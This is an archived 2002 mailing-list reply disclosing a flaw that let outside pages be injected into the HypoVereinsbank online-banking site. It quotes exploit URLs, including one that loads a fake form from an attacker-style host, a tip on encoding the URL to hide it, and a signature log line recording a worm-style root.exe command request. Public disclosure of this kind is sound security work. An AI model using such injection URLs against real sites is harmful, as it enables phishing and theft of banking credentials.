From: Dominik Birk (dominik@code-foundation.de)
Date: Thu Apr 04 2002 - 17:51:05 EST
At 12:12 05.04.02 +0200, hnz geeratz[room23] wrote:
>hello
good evening hnz
>I found this security issue on the german hypovereins bank.
I'm from Germany and there was a gap like this in the hypovereinsbank site
a few months ago.
>They are informed vor 3 months ago , still there is nothing changed.
>The security hole will allow a atacker to include his own forms in the
>website. This will give him an option to collect sensible information.
>It is a home bankin system!
I think you can call this security hole CSS (cross-site-scripting). At this
moment I would like to appeal to the paper of Obscure.
http://eyeonsecurity.net/papers/Extended%20HTML%20Form%20Attack.htm
The german version is under
http://www.code-foundation.de/archiv/form_attack.htm
>take a look at this (long) URL:
>http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
>
>now it is possible to change the
>pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
>part to something like pageurl=http://www.evol.org/fake_form.php
>
>ore try :
>http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de
>
>so it is possible to include everything in this webpage.
>The attacker could obscure the url in a form like:
>pageurl=h%74t%70%3A%2Fw%77w%77............
>so the user will not notice that the include form is not from the original
>server
Yes, you are right. This is a really bad security hole an in my opinion it
is negligent to let shit hole open. The Hypovereinsbank is a great bank in
Germany.
>It opens a port to a new form of social hacking and data grabbing.
ACK. I'm very astonished about the negligence of several System Admins.
>greetings hnz g
Sincerely
Dominik Birk
-- http://www.code-foundation.de 217.229.69.207 - - [14/Oct/2001:02:29:41 +0200] "GET /MSADC/root.exe?/c+dir Microsoft? Where do you want to surf today?
This archive was generated by hypermail 2.1.7 : Wed Apr 09 2008 - 22:28:02 EDT